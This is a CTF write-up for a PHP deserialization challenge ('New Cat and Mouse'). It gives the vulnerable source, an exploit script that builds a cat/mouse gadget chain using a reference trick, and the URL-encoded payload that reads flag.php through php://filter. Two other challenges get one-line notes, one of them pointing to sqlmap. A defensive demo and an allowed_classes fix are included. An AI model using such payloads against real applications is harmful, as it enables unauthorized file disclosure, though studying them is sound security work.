Contents
SIGNIN
New Cat and Mouse
baby_sql
SIGNIN
Sign in and capture the request.
New Cat and Mouse
We see a deserialization entry point.
Let's analyze it.
<?php
//flag is in flag.php
highlight_file(__FILE__);
error_reporting(0);
class mouse
{
    public $v;
    public function __toString()
    {
        echo "Good. You caught the mouse:";
        // File inclusion here: this include is where flag.php gets read.
        include($this->v);
    }
}
class cat
{
    public $a;
    public $b;
    public $c;
    public function __destruct(){
        $this->dog();
        $this->b = $this->c;
        die($this->a);
    }
    public function dog()
    {
        $this->a = "I'm a vicious dog, Kitty";
    }
}
unserialize($_GET["cat"]);
?>
In short: read flag.php through a PHP stream wrapper (php://filter).
So we need to build a string that is the wrapper and put it into mouse::$v,
then get that mouse object into cat::$a, so that die($this->a) stringifies it, cat's chain calls __toString, and the include executes the wrapper.
exp
<?php
// Local copies of the classes with no magic methods, so that serializing
// does not trigger the destructor on our side.
class mouse
{
    public $v = "php://filter/read=convert.base64-encode/resource=flag.php";
}
class cat
{
    public $a;
    public $b;
    public $c;
}
$ee = new cat();
$ee->c = new mouse();
$ee->b = &$ee->a;   // b references a: the assignment in __destruct rewrites a
echo urlencode(serialize($ee));
?>
First build the wrapper string as the mouse's $v.
Then build the cat and put the mouse into c.
Then make b a reference to a: dog() overwrites a first, but the following $this->b = $this->c writes through the reference, so a ends up holding the mouse.
Serialize and URL-encode the object.
Once the payload is submitted, die($this->a) triggers __toString and the include.
O%3A3%3A%22cat%22%3A3%3A%7Bs%3A1%3A%22a%22%3BN%3Bs%3A1%3A%22b%22%3BR%3A2%3Bs%3A1%3A%22c%22%3BO%3A5%3A%22mouse%22%3A1%3A%7Bs%3A1%3A%22v%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D
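The following script is an added example and is not part of the original writeup or the challenge source. It replays the cat/mouse gadget chain locally to show why the reference trick works, and then shows the same payload neutralised by unserialize() with allowed_classes => false. The challenge's include($this->v) is replaced by a harmless echo so the demo runs without a flag.php on disk; the payload literal is the writeup's payload, URL-decoded.

```php
<?php
// Added example, not the challenge's or the writeup's own code.
// The classes mirror the challenge, except that include() is replaced
// by an echo of the wrapper string so nothing is actually opened.

class mouse
{
    public $v;
    public function __toString()
    {
        // The real challenge calls include($this->v) here.
        return "would include: " . $this->v . "\n";
    }
}

class cat
{
    public $a;
    public $b;
    public $c;
    public function __destruct()
    {
        $this->dog();          // overwrites a, but b is still a reference to a
        $this->b = $this->c;   // writes through the reference: a becomes the mouse
        die($this->a);         // die() stringifies a, so mouse::__toString() runs
    }
    public function dog()
    {
        $this->a = "I'm a vicious dog, Kitty";
    }
}

// The writeup's payload, URL-decoded. Kept as a literal so that no cat object
// has to be constructed here (its destructor would fire immediately).
const PAYLOAD = 'O:3:"cat":3:{s:1:"a";N;s:1:"b";R:2;s:1:"c";'
    . 'O:5:"mouse":1:{s:1:"v";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}}';

// Hardened call: refuse to instantiate any class. Both objects come back as
// __PHP_Incomplete_Class, so neither __destruct nor __toString can ever run.
$safe = unserialize(PAYLOAD, ['allowed_classes' => false]);
echo "hardened unserialize returned: " . get_class($safe) . "\n";

// Original call: classes are instantiated. The result is discarded, so the cat
// is destroyed at once, __destruct runs, and the chain fires.
echo "vulnerable unserialize: ";
unserialize(PAYLOAD);
// Not reached: die() inside __destruct ends the script after printing
// "would include: php://filter/read=convert.base64-encode/resource=flag.php".
```

The fix a reviewer would want on the challenge code is the second argument to unserialize(): either allowed_classes => false, or an explicit whitelist that does not contain any class with a __destruct, __wakeup or __toString gadget. Untrusted input should not reach unserialize() at all; a JSON structure validated by hand carries no object lifecycle and cannot trigger magic methods.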
baby_sql
POST request: capture it and feed it to sqlmap.